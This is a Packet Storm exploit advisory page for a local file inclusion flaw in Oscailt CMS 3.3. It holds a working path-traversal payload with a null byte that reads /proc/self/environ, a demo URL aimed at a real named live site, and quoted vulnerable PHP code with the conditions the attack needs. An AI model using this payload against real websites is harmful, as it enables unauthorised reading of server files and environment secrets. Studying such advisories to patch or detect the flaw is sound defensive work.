exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oscailt 3.3 Local File Inclusion

Oscailt 3.3 Local File Inclusion
Posted Oct 28, 2009
Authored by s4r4d0

Oscailt CMS version 3.3 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 62cc89dcaa822c8aacccf2326a30726ab50fc22820b678b1198ee5566f5b10b6

Oscailt 3.3 Local File Inclusion

Change Mirror Download
[0] Oscailt 3.3 CMS 
[0] Download: http://sourceforge.net/projects/oscailt/
[0] Bug: Local File Inclusion in index.php file !
[0] Author: s4r4d0@yahoo.com
[0] Team: Fatal Error
[0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00
[0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!!
[0] Made in Brazil - SP
[0] Source Code:
# SecurityReason Note :
#
# The option "Use Friendly URL's" in configuration must be set off
#
# Vulnerable Code in index.php :
#
# $target_indyobject_id = getRequestTargetObjectID();
# ...
# if(!$use_live)
# {
# $cachefile = getObjectCacheIndexFile($target_indyobject_id);
# if(file_exists($cachefile))
# {
# include_once($cachefile);
# }
#
# in function getObjectCacheIndexFile() we have ...
#
# function getObjectCacheIndexFile($id)
# {
# $dir = getObjectCacheDir($id);
# $f = $id.'.inc';
# return $dir.$f;
# }
#
# As we can see , $cachefile try include inc file in cache dir.
#
# magic_quotes = Off // to use %00 null byte
#
# - sp3x
#

[0]Reference: http://securityreason.com/exploitalert/7422



Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close